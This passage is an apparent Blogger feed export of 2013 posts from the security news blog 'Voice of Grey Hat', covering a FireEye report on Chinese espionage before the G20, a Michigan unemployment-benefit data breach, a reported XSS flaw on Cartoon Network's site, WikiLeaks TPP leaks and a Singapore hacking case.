<li style="border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"><span style="font-family: inherit;"><strong style="border: 0px; font-style: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Subsystem Management</strong> – Simplified configuration and administration with uniform management tools for networking, storage, file systems, performance, identities and security. Leveraging the OpenLMI framework, enables use of scripts and APIs to automate management.</span></li>
</ul>
<div>
<span style="line-height: 24px;">To know deeply about the hot features and enhancement of RHEL 7 beta 1, click <a href="https://access.redhat.com/site/sites/default/files/pages/attachments/rhel_whatsnewrhel7beta_techoverview_.pdf">here</a>. </span><span style="line-height: 24px;">I am quite sure that, after going through with the above description, all of you are very much excited to grab this brand new beta of RHEL 7. Like the previous beta release, this time also The Red Hat Enterprise Linux 7 beta has been made </span><span style="line-height: 24px;">available</span><span style="line-height: 24px;"> to Red Hat customers, partners, and members of the public. For further information and to access the beta click </span><a href="https://access.redhat.com/site/products/Red_Hat_Enterprise_Linux/Get-Beta" style="line-height: 24px;">here</a><span style="line-height: 24px;">. Last but not least, with this release Red Hat also calls for an very interesting competition, where you can participate & <a href="https://www.techvalidate.com/registration/Red-Hat-Enterprise-Linux-7-Beta">win $500 while telling Red Hat, what interests you most</a> in RHEL 7 beta. So what are you waiting for, lets <b><a href="http://ftp.redhat.com/redhat/rhel/beta/7/x86_64/iso/rhel-everything-7.0-beta-1-x86_64-dvd.iso">download RHEL 7</a></b> and explore it. </span><br />
<span style="line-height: 24px;"><br /></span>
<span style="line-height: 24px;"><br /></span>
<span style="line-height: 24px;"><br /></span></div>
</div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-84493422887326752412013-12-13T01:23:00.000+05:302013-12-13T01:23:42.130+05:30Chinese Hackers Eavesdropping European Diplomats Before G20 Summit <div dir="ltr" style="text-align: left;" trbidi="on">
<div style="margin: 0in 0in 0.0001pt; text-align: center;">
<span style="font-size: large;">Researchers<span style="background-color: white;"> At <b>FireEye</b> Found -</span><span style="text-align: left;"><b>Chinese Hackers</b> </span><span style="text-align: left;"><i><span style="color: red;"><b>Snitching</b></span></i> </span> Europeans Before <b>G20 Summit</b></span><span style="font-size: medium;"><b> </b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFQJnPaOSBcjY3Kzln33MNl9h5ryJpFUVaYv7NjfatjEnc_vV8JiqlrIL-ryr8G1ndE7BXnHltkUv3pQ86UluynGJ-NoQNO5yGg5k_AQgqKkDs5-DF0mGX8gcENvAoTgLURtxpnE2qVhA/s1600/chinese-hackers-eavesdropping-europeans-before-G20-summit.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFQJnPaOSBcjY3Kzln33MNl9h5ryJpFUVaYv7NjfatjEnc_vV8JiqlrIL-ryr8G1ndE7BXnHltkUv3pQ86UluynGJ-NoQNO5yGg5k_AQgqKkDs5-DF0mGX8gcENvAoTgLURtxpnE2qVhA/s400/chinese-hackers-eavesdropping-europeans-before-G20-summit.jpg" width="400" /></a></div>
<span style="font-family: inherit;"><span style="background-color: white; text-align: justify;">Story of </span><span style="text-align: justify;"><a href="http://www.voiceofgreyhat.com/search?q=cyber+espionage" style="outline: none;"><span style="background: white; text-decoration: none; text-underline: none;">cyber espionage</span></a><span style="background: white;"> by <b><a href="http://www.voiceofgreyhat.com/search?q=china&max-results=20&by-date=true" style="outline: none;"><span style="text-decoration: none; text-underline: none;">Chinese hackers</span></a></b> used
to remain one of most highest pick of </span>breakneck. Yet again
another breathtaking issue of <a href="http://www.voiceofgreyhat.com/search?q=eavesdropping">eavesdropping</a> by Chinese hackers
get <a href="http://www.reuters.com/article/2013/12/10/us-china-hacking-g-idUSBRE9B817C20131210">spot light</a>, when California-based renounced computer
security firm <a href="http://www.fireeye.com/">FireEye Inc</a> have figured out that a group of <a href="http://www.voiceofgreyhat.com/search?q=Chinese+hackers">Chinese hackers</a> eavesdropped on the computers of five European foreign ministries
before last September's G20 Summit, which was dominated by the Syrian crisis.
From the detailed analysis we came to know that the hackers
have infiltrated the ministries' computer networks by sending emails to
staff containing tainted files with titles such as
<b>"US_military_options_in_Syria,"</b> which sells <a href="http://www.voiceofgreyhat.com/search?q=virus">virus</a> fighting technology
to companies. Whenever the targeted recipients opened those documents,
they loaded <a href="http://www.voiceofgreyhat.com/search?q=malicious">malicious code</a> on to their personal computers. <a href="http://www.voiceofgreyhat.com/search?q=researchers">Researchers</a> of
FireEye said that they were able to monitor the "inner workings"
of the main computer server used by the hackers to conduct their reconnaissance
and move across compromised systems for about a week in the late August. But
suddenly they lost access to the hackers after they moved to another server
shortly before the G20 Summit in St. Petersburg, <a href="http://www.voiceofgreyhat.com/search?q=Russia">Russia</a>. </span></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: inherit;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBB6xrZSBR4I_FRiCc3aNRAW3Qv9L240p7rLeHp0TmO_S4d9XhydqgshZnN1CdV700pGKReLd3lewxsNulMdpDQ3nf-e87ei3O45EzshWvYVgt7hTbd4BWDn_-6GwbrT3hqEJWn8VOBT4/s1600/G20-summit.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBB6xrZSBR4I_FRiCc3aNRAW3Qv9L240p7rLeHp0TmO_S4d9XhydqgshZnN1CdV700pGKReLd3lewxsNulMdpDQ3nf-e87ei3O45EzshWvYVgt7hTbd4BWDn_-6GwbrT3hqEJWn8VOBT4/s320/G20-summit.jpg" width="320" /></a></span></div>
<span style="font-family: inherit; text-align: justify;">Though the company has
declined in open press to identify the nations whose ministries were hacked,
although it said they were all members of the European Union. But FireEye
informed the </span><a href="http://www.voiceofgreyhat.com/search?q=FBI" style="font-family: inherit; text-align: justify;">FBI</a><span style="font-family: inherit; text-align: justify;"> about the whole issue in details. </span><a href="http://www.voiceofgreyhat.com/search?q=FireEye" style="font-family: inherit; text-align: justify;">FireEye</a><span style="font-family: inherit; text-align: justify;"> also confirmed
that the hackers where from China, but they did not find evidence which may
link those hackers to the </span><a href="http://www.voiceofgreyhat.com/search?q=Chinese+government" style="font-family: inherit; text-align: justify;">Chinese government</a><span style="font-family: inherit; text-align: justify;">. Not surprisingly and obviously
like earlier the Chinese government has distanced itself from any claim that it
might have hacked foreign governments for data. FireEye also successfully
monitor several dozen hacking groups operating in China, most of which they
suspect of having ties to the government. The firms also suspect the hacking
groups of stealing intellectual property for commercial gain.
The </span><a href="http://www.voiceofgreyhat.com/search?q=researchers" style="font-family: inherit; text-align: justify;">researchers</a><span style="font-family: inherit; text-align: justify;"> </span><span style="background-color: white; background-position: initial initial; background-repeat: initial initial; font-family: inherit; text-align: justify;">had
been following the hackers behind the Syria-related attack for several years,
but this is the first time the group's activities have been publicly
documented. The company calls the group <b>"Ke3chang," </b>after the name of
one of the files it uses in one of its pieces of malicious <span class="mandelbrotrefrag">software</span>. </span><u1:p style="font-family: inherit; text-align: justify;"></u1:p><span style="font-family: inherit; text-align: justify;">"</span><i style="font-family: inherit; text-align: justify;">The
theme of the attacks was U.S. military intervention in Syria,"</i><span style="font-family: inherit; text-align: justify;"> said
FireEye researcher Nart Villeneuv. </span><br />
<div style="margin: 0in 0in 0.0001pt; text-align: justify;">
<span style="font-family: inherit;">On
reaction Chinese Foreign Ministry spokesman Hong Lei said- <i>"U.S.
internet companies are keen on hyping up the so-called hacker threat from
China, but they never obtain irrefutable proof, and what so-called evidence
they do get is widely doubted by experts. This is neither professional nor
responsible," </i></span></div>
<div style="margin: 0in 0in 0.0001pt; text-align: justify;">
<span style="font-family: inherit;">While
talking in this story of <a href="http://www.voiceofgreyhat.com/search?q=Chinese+eavesdropping">Chinese eavesdropping</a>, I also want to dig some
points from decent parts where we all became very habituated of seeing <a href="http://www.voiceofgreyhat.com/search?q=Europe">Europe</a>
& <a href="http://www.voiceofgreyhat.com/search?q=US">U.S. countries</a> <a href="http://www.voiceofgreyhat.com/2013/03/WhiteHouse-Calls-China-to-Stop-Hacking.html">blaming China</a> for engaging <a href="http://www.voiceofgreyhat.com/search?q=cyber+attack">cyber attacks</a>; and China also
<a href="http://www.voiceofgreyhat.com/2013/03/Chinese-defnese-attacked-by-us-hackers.html">do the same</a> for accusing U.S. like vice versa. I am reviving your memories
of last few years where <span style="background: white;">If you look at the
story of major <a href="http://www.voiceofgreyhat.com/search?q=cyber+attack">cyber attacks</a> of <a href="http://www.voiceofgreyhat.com/2013/">this year</a> we will find that the name of China
has been involved</span> several times for engaging cyber attacks
against several high profile websites and organization of U.S.
including <a href="http://www.voiceofgreyhat.com/2013/02/chinese-hackers-breached-new-york-times.html" style="outline: none;"><span style="text-decoration: none; text-underline: none;">New
York Times</span></a>, <a href="http://www.voiceofgreyhat.com/2013/02/Twitter-Hacked-250000-User-Data-Compromised.html" style="outline: none;"><span style="text-decoration: none; text-underline: none;">Twitter</span></a>, <a href="http://www.voiceofgreyhat.com/2013/02/NBC.com-Compromised.html" style="outline: none;"><span style="text-decoration: none; text-underline: none;">NBC</span></a> and
so on. And if you refresh our memory then then we will find
the scenario of big cyber attack and espionage by Chinese
hackers have been <a href="http://www.voiceofgreyhat.com/2012/10/White-House-Unclassified-Network-Hacked-By-Chinese-Hackers.html" style="outline: none;"><span style="text-decoration: none; text-underline: none;">spotted
several times</span></a>. In <a href="http://www.voiceofgreyhat.com/2012/">2012</a> Chinese hackers had <a href="http://www.voiceofgreyhat.com/2012/09/Chinese-Hackers-Gained-Control-of-US-Power-Grid.html" style="outline: none;">breached</a> Telvent's corporate network &
gained control of <a href="http://www.voiceofgreyhat.com/search?q=power%20grid" style="outline: none;">US
Power Grid</a>. Also in the middle of last year, we have seen that <a href="http://www.voiceofgreyhat.com/search?q=China" style="outline: none;">Chinese
hackers</a> have broken into <a href="http://www.voiceofgreyhat.com/2012/07/chinese-hackers-broke-into-indian-navys.html" style="outline: none;">Indian Navy's Computer System</a> & stolen
sensitive data. Few months before this hack, Tokyo based
computer security firm <a href="http://trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_luckycat_redux.pdf" style="outline: none;">Trend Micro</a> confirmed that Chinese hackers were responsible
for biggest <a href="http://www.voiceofgreyhat.com/2012/04/chinese-hackers-were-responsible-for.html" style="outline: none;">cyber-espionage</a> in India, Japan & Tibet.
Also the director of <a href="http://www.voiceofgreyhat.com/search?q=NSA" style="outline: none;"><b>National
Security Agency (NSA)</b></a> General Keith Alexander confirmed that
hackers from China was responsible for the serious attack on one of the leading
IT security & cyber security company <a href="http://www.voiceofgreyhat.com/search?q=RSA" style="outline: none;"><b>RSA</b></a>. Also
in 2011 <a href="http://www.voiceofgreyhat.com/search?q=China" style="outline: none;">China</a> was responsible behind the attack on <a href="http://www.voiceofgreyhat.com/2011/12/us-chamber-of-commerce-under-massive.html" style="outline: none;">US Chamber of Commerce</a>, <a href="http://www.voiceofgreyhat.com/2011/10/satellite-system-of-us-was-attacked-by.html" style="outline: none;">Satellite System of U.S</a>, <a href="http://www.voiceofgreyhat.com/2012/02/nortel-network-breached-by-chinese.html" style="outline: none;">Nortel Network</a> & so on. But few days
ago National Computer Network Emergency Response Coordination Center of China
(CNCERT/CC), China's primary computer security monitoring network claimed that
China fallen victim of one of <a href="http://www.voiceofgreyhat.com/2012/03/china-claimed-to-be-biggest-victim-of.html" style="outline: none;">biggest cyber attacks</a> originated from <a href="http://www.voiceofgreyhat.com/search?q=US">US</a>, <a href="http://www.voiceofgreyhat.com/search?q=Japan">Japan</a>
& <a href="http://www.voiceofgreyhat.com/search?q=South+Korea">South Korea</a>. We must have to say that this statement is truly irrelevant. <a href="http://www.voiceofgreyhat.com/search/label/cyber-crime" style="outline: none;"><span style="text-decoration: none; text-underline: none;">Cyber crime</span></a> investigator
have found that China was directly responsible for the hack into Japan's <a href="http://www.voiceofgreyhat.com/2011/09/japans-biggest-defense-contractor.html" style="outline: none;">Biggest Defense Contractor Mitsubishi</a>, <a href="http://www.voiceofgreyhat.com/2012/01/hackers-have-stolen-data-from-japan.html" style="outline: none;">Japan Aerospace Exploration Agency (JAXA)</a> & <a href="http://www.voiceofgreyhat.com/2011/10/parliament-of-japan-under-cyber-attack.html" style="outline: none;">Parliament of Japan</a>. In case of South Korea
more than <a href="http://www.voiceofgreyhat.com/2011/11/south-korea-under-massive-cyber-attack.html" style="outline: none;">13 Million of MapleStory players</a> data has been
stolen, there also hackers from China was responsible. <o:p></o:p></span></div>
<div style="margin: 0in 0in 0.0001pt; text-align: justify;">
<br /></div>
<div style="margin: 0in 0in 0.0001pt; text-align: justify;">
<span style="font-family: inherit;">Before I conclude, I request you to closely look at the above mentioned stories, you will find <a href="http://www.voiceofgreyhat.com/search?q=China">China</a> majorly responsible for <a href="http://www.voiceofgreyhat.com/search?q=eavesdropping">eavesdropping</a> & <a href="http://www.voiceofgreyhat.com/search?q=security+breach">security breach</a>. On the same side China also been effected by the same way. So in <span style="text-align: left;">conclusion, we cant put a full stop in this chain of <a href="http://www.voiceofgreyhat.com/search?q=cyber+attack">cyber attacks</a>, <a href="http://www.voiceofgreyhat.com/search?q=hacking">hacking</a> & </span><a href="http://www.voiceofgreyhat.com/search?q=eavesdropping">eavesdropping</a>, as it comes from both end. So this exciting episode will be continued like it does. If you want to stay updated then don't forget to stay tuned with <b><a href="http://www.voiceofgreyhat.com/">VOGH</a></b>. </span></div>
<div style="margin: 0in 0in 0.0001pt; text-align: justify;">
<span style="font-family: inherit;"><br /></span></div>
<div style="margin: 0in 0in 0.0001pt; text-align: justify;">
<span style="font-family: inherit;"><br /></span></div>
<div style="margin: 0in 0in 0.0001pt; text-align: justify;">
<span style="font-size: medium;"><br /></span></div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-66596261162877501392013-12-13T01:22:00.001+05:302013-12-13T01:22:02.552+05:30Security Breach Invaded 8,500 Recipients of Unemployment Insurance Agency Michigan (UIA) <div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="font-size: large;">Michigan <b>Unemployment Insurance Agency (UIA)</b> <i><span style="color: red;">Hacked</span>!</i> <b>8,500 Recipients</b> <span style="color: red;">Personal Data Leaked</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7SoMZrXjuKvjF0-NEmMVGn2QZcGhaujJB9O8917BFrperBUfl3n6wDFPnjNY1mZk1_k3UF0IZd60zUnKztKLHbDZduXLKIdSWtvi9P7_mXkvhEoduFzzzz4988bIRxxHDbtT4j_-UVVk/s1600/unemployment-insurance-agency-hacked.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="285" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7SoMZrXjuKvjF0-NEmMVGn2QZcGhaujJB9O8917BFrperBUfl3n6wDFPnjNY1mZk1_k3UF0IZd60zUnKztKLHbDZduXLKIdSWtvi9P7_mXkvhEoduFzzzz4988bIRxxHDbtT4j_-UVVk/s400/unemployment-insurance-agency-hacked.jpg" width="400" /></a></div>
<div style="text-align: justify;">
A major <a href="http://www.voiceofgreyhat.com/search?q=security+breach">security breach</a> has invaded <b><a href="http://www.michigan.gov/uia%E2%80%8E">Unemployment Insurance Agency</a></b> of Michigan, widely known as <b>UIA</b>. <a href="http://www.freep.com/article/20131212/NEWS06/312120098/unemployment-security-breach-Michigan">Sources</a> revealed that the attack was placed in between mid of July to mid of September which affected more than <b>8,500 unemployment insurance recipients</b> in Michigan with <a href="http://www.voiceofgreyhat.com/search?q=leak">leak</a> of s<span style="color: red;">ocial security numbers, bank account numbers, passwords, phone numbers</span> & few other sensitive data. This <a href="http://www.voiceofgreyhat.com/search?q=security+breach">security breach</a> was first detected Sept. 17 by contractor JP Morgan Chase. In his reaction the director of the Unemployment Insurance Agency, Shaun Thomas said -<i>“The UIA is deeply concerned about this incident.” </i>But due to some untold reason state official were not notified until this December first week. Dan Lohrmann, the state’s chief security officer in the Department of Technology, Management and Budget, said he has “worked closely with JP Morgan Chase to share our concern about the delayed notification and to ensure that the state receives immediate notice of future problems. <i>“We work around the clock to keep citizen information and data protected, and I feel confident that everyone involved in this event understands the importance of protecting personal information.” </i>Chase, which handles the debit cards Michigan uses to pay unemployment insurance benefits to some recipients, said those who accessed the bank’s website between mid-July and mid-September may have been affected. The 8,500 claimants in Michigan are among about 465,000 cardholders nationwide who may have been affected, the bank said. So far the identity of the <a href="http://www.voiceofgreyhat.com/search?q=hackers">hackers</a> & their reasons behind this <a href="http://www.voiceofgreyhat.com/search?q=cyber+attack">attack</a> is not been identified, but Chase has notified <a href="http://www.voiceofgreyhat.com/search?q=law+enforcement">law enforcement</a> and both the bank and the state will be notifying claimants whose information was potentially compromised. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-54124948859520604442013-12-10T02:26:00.002+05:302013-12-10T02:26:22.217+05:30Cartoon Network (CN) Official Website is Vulnerable to XSS Attack <div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="font-size: large;"><b><span style="color: red;">XSS Vulnerability</span></b> Found in <b>Cartoon Network's (CN)</b> Official Website By<b> Dr41DeY </b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHDEgn648KaI97puQzetCLliIU_VPuCItApLwwACqt4BhdwjkFRr6V9ez_i3Lcji9QDNgi-KktJw-b0Uf5ynUSq7lKskeDwoaW3shyphenhyphenOOUD3azkUsMZEqW4QHqpcy7d7hy81LqjehvMLMg/s1600/cartoonnetwork_vulnerable2-xss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHDEgn648KaI97puQzetCLliIU_VPuCItApLwwACqt4BhdwjkFRr6V9ez_i3Lcji9QDNgi-KktJw-b0Uf5ynUSq7lKskeDwoaW3shyphenhyphenOOUD3azkUsMZEqW4QHqpcy7d7hy81LqjehvMLMg/s400/cartoonnetwork_vulnerable2-xss.png" width="400" /></a></div>
<div style="text-align: justify;">
After the successful breach of <a href="http://www.voiceofgreyhat.com/2013/12/DY365TV-satellite-channel-of-assam-hacked.html">'DY365 TV'</a> yet again the hacker going by the name of <b><a href="http://www.voiceofgreyhat.com/search?q=Dr41DeY">Dr41DeY</a></b> from Nigerian Cyber Army targeted another <a href="http://www.voiceofgreyhat.com/search?q=TV+network">TV network</a>. Guess what, this time he caught even a bigger fish. Unlike <a href="http://www.voiceofgreyhat.com/search/label/defacement">defacement</a> or <a href="http://www.voiceofgreyhat.com/search?q=breach">breach</a> this time the hacker did something what it called ethical or can be categorized in <a href="http://www.voiceofgreyhat.com/search?q=white+hat">white-hat</a> list. Okey now without pulling the intro more longer lets directly come to the story -and that is the official website of <b><a href="http://www.cartoonnetwork.com/">Cartoon Network</a></b> is <a href="http://www.voiceofgreyhat.com/search/label/vulnerablity">vulnerable</a> of cross site scripting attack also known as <a href="http://www.voiceofgreyhat.com/search?q=XSS">XSS attack</a>. Cartoon Network mostly known as CN is the worlds leader in broadcasting animated programming, ranging from action to animated comedy & many more. This satellite channel is the most preferred channel for the children and teenagers between the ages of 7 to 5 among the whole of the world. So it is quit indisputable that the official website of Cartoon Network (CN) is indeed a valuable website which have large number of traffic everyday. But it is unclear that being such a big and popular brand name, why CN committed such a massacre while leaving <a href="http://www.voiceofgreyhat.com/search?q=XSS+vulnerability">XSS vulnerability</a> in their official portal. Dr41DeY shared with <a href="http://www.voiceofgreyhat.com/">VOGH</a>, that the <a href="http://www.cartoonnetwork.com/search/index.html?keywords="><b><span style="color: red;">search box</span></b></a> in the home page of CN poses non persistent XSS vulnerability. The above screen shots was taken as a proof of the story. I on behalf of Team VOGH has already contacted CN authorities, and knocked them about this issue. Hopefully they will take appropriate steps with out doing any further delay. For updates in this story and also other hot cyber issues, just stay tuned with <b><a href="http://www.voiceofgreyhat.com/">VOGH</a></b>. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-54413251462292372612013-12-10T02:26:00.001+05:302013-12-10T02:28:40.611+05:30WikiLeaks Revealed Two New Documents of Trans Pacific Partnership Agreement (TPP) <div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="font-size: large;"><b><span style="color: red;">WikiLeaks</span> </b>Revealed <b>Two New Documents </b>of </span><span style="text-align: left;"><span style="font-size: large;">Confidential </span></span><i style="font-size: x-large;"><span style="color: red;">Trans Pacific Partnership Agreement (TPP)</span></i></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgxXnirS1RqKSIhvrjv0g8O0IwGiuhFqehpeA9nQuiRX2J7TjYNoBps7S5dhiIBCSrl_8YF0OlPkfcYwHKp3hiZIOPMcaTfcxDDe6jAk1wixXISSjV3ObcQbXnFh3gHgnP83hW0v7hqks/s1600/secreet-trans-pacific-partnership-agreement-tpp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgxXnirS1RqKSIhvrjv0g8O0IwGiuhFqehpeA9nQuiRX2J7TjYNoBps7S5dhiIBCSrl_8YF0OlPkfcYwHKp3hiZIOPMcaTfcxDDe6jAk1wixXISSjV3ObcQbXnFh3gHgnP83hW0v7hqks/s400/secreet-trans-pacific-partnership-agreement-tpp.png" width="341" /></a></div>
<div style="text-align: justify;">
Last <a href="http://www.voiceofgreyhat.com/2013/11/">month</a> <b><a href="http://www.voiceofgreyhat.com/search/label/wikileaks">WikiLeaks</a></b> has <a href="http://www.voiceofgreyhat.com/2013/11/wikiLeaks-uncovered-TPP-a-threat-for-internet.html">published</a> the draft of secret <b><a href="http://www.voiceofgreyhat.com/search?q=TPP">Trans Pacific Partnership Agreement (TPP)</a></b>, uncovering the United States' covert international push for stronger intellectual property rights. Now just a month later <b>two more breathtaking documents of TPP </b>has been revealed by the <a href="http://www.voiceofgreyhat.com/search?q=Julian%20Assange">whistle blower</a>, that show the state of negotiations as the twelve TPP countries began supposedly final negotiations at a trade ministers’ meeting in Singapore this week. This leaks come at a particularly inconvenient time for negotiators, as they enter into their fourth day of talks in Singapore amid growing criticism. The talks are premised on secrecy, allowing countries to push for particular proposals without having to justify their positions publicly, but the continued pressure from WikiLeaks has brought unintended attention to the proceedings.</div>
<div style="text-align: justify;">
According to official release of WikiLeaks -One document describes deep divisions between the United States and other nations, and "great pressure" being exerted by the US negotiators to move other nations to their position. The other document lists, country-by-country, the many areas of disagreement remaining. It covers intellectual property and thirteen other chapters of the draft agreement. This suggests that the TPP negotiations can only be concluded if the Asia-Pacific countries back down on key national interest issues, otherwise the treaty will fail altogether. The above described two documents are dubbed as <b><a href="http://wikileaks.org/IMG/pdf/tpp-salt-lake-extracts-.pdf">TPP Salt Lake Extracts</a></b> & <b><a href="http://wikileaks.org/IMG/pdf/tpp-salt-lake-positions.pdf">TPP Salt Lake Positions</a></b>. For additional information about this issue click <a href="http://wikileaks.org/Second-release-of-secret-Trans.html?update">Here</a>. For further updates on TPP and also other hot <a href="http://www.voiceofgreyhat.com/search/label/wikileaks">WikiLeaks</a> stories & cyber issues, just stay tuned with <b><a href="http://www.voiceofgreyhat.com/">VOGH</a></b>. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br />
<br /></div>
<div style="text-align: justify;">
<br /></div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-70865989628708202452013-12-08T01:14:00.002+05:302013-12-08T01:14:39.927+05:30Anonymous Hacker Denied Bail in Singapore, Accused For Hacking Prime Minister Website<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="font-size: large;"><b>Anonymous</b> Hacker <b><span style="color: red;">Denied Bail</span></b> in <b>Singapore</b>, Accused For <i>Hacking Prime Minister Website</i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCUO9sF-W6UHEY5vJ_wewr8KQKJ-1qYqDCA7EQ8s1KTWPhc_1Ky6FA_dIcmDVUnAInq8ITNcpoDheZTAVuXme3Q_1A2ypydvkkdATtz67sCR_sddBovK0KM28KOGgTD7mfcg2VKNWv-9M/s1600/anonymous-hacker-denied-bail-in-singapore.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="237" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCUO9sF-W6UHEY5vJ_wewr8KQKJ-1qYqDCA7EQ8s1KTWPhc_1Ky6FA_dIcmDVUnAInq8ITNcpoDheZTAVuXme3Q_1A2ypydvkkdATtz67sCR_sddBovK0KM28KOGgTD7mfcg2VKNWv-9M/s400/anonymous-hacker-denied-bail-in-singapore.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div style="text-align: justify;">
A Singapore <a href="http://www.voiceofgreyhat.com/search?q=court">court</a> in this week has <a href="http://www.voiceofgreyhat.com/search?q=bail">denied bail</a> of accused <a href="http://www.voiceofgreyhat.com/search?q=anonymous+hacker">anonymous hacker</a> charged for hacking high value government websites. Last month a Singaporean hacker named <b>James Raj</b> was extradited from <a href="http://www.voiceofgreyhat.com/search?q=Malaysia">Malaysia</a>. He was charged for hacking the <a href="http://www.amktc.org.sg/"><b>Ang Mo Kio district website</b></a>, whose MPs include <a href="http://www.pmo.gov.sg/"><b>Prime Minister Lee Hsien Loong</b></a>, under the banner of worlds most dangerous <a href="http://www.voiceofgreyhat.com/search?q=hacktivist">hacktivist</a> community <a href="http://www.voiceofgreyhat.com/search/label/anonymous">Anonymous</a>. The alleged hacking was among a string of <a href="http://www.voiceofgreyhat.com/search?q=cyber+attack">cyber attacks</a> that have also targeted the websites of <a href="http://www.pmo.gov.sg/%E2%80%8E">Premier Lee</a> and <a href="http://www.istana.gov.sg/">President Tony Tan</a> as well as pro-government media, in a row over Internet freedom in the city state. This 35 years old hacker was deeply linked with <a href="http://www.voiceofgreyhat.com/search/label/anonymous">Anonymous</a> and he was covered himself with nickname <b><span style="color: red;">"The Messiah".</span></b> District Judge Soh Tze Bian said Raj, posed a flight risk because he previously jumped bail and fled to Malaysia after being slapped with illegal drugs consumption charges in 2011. </div>
<div style="text-align: justify;">
Police have previously said Raj was also linked to other hacking attacks, including on the website of a charity associated with the ruling <a href="http://www.pap.org.sg/">People's Action Party</a>. Two Singaporean men have so far been charged with defacing the president's website. Police have said that there are no links between Raj and these suspects. </div>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/y1PF0VTOU6Q?feature=player_embedded' frameborder='0'></iframe></div>
<div style="text-align: justify;">
The round of attack from Raj took place three days before a self-proclaimed spokesperson for Anonymous appeared in a video on October 31 to demand the scrapping of a recent Singapore law requiring news websites to obtain annual licences. The Internet licensing rules, which came into effect in June, have sparked anger among bloggers and activists who say they are designed to muzzle free expression. Singapore strictly regulates the traditional media, but insists the recent licensing rules do not impinge on Internet freedom. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: right;">
<span style="font-size: xx-small;">-Source (<a href="http://www.globalpost.com/dispatch/news/afp/131204/singaporean-anonymous-hacker-denied-bail">Global Post</a>)</span></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-11249839004509427862013-12-08T01:14:00.001+05:302013-12-08T01:14:33.426+05:30Microsoft Along With FBI & EC3 Shattered The Notorious ZeroAccess Botnet<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="font-size: large;"><b><span style="color: #3d85c6;">Microsoft</span></b> Along With <b><span style="color: blue;">FBI</span></b> &<b><span style="color: blue;"> EC3</span></b> Shattered The Notorious <b><i><span style="color: red;">ZeroAccess Botnet </span></i></b>Responsible For Infecting More Than <b>2 Million Computers</b></span></div>
<div class="separator" style="clear: both; text-align: center;">
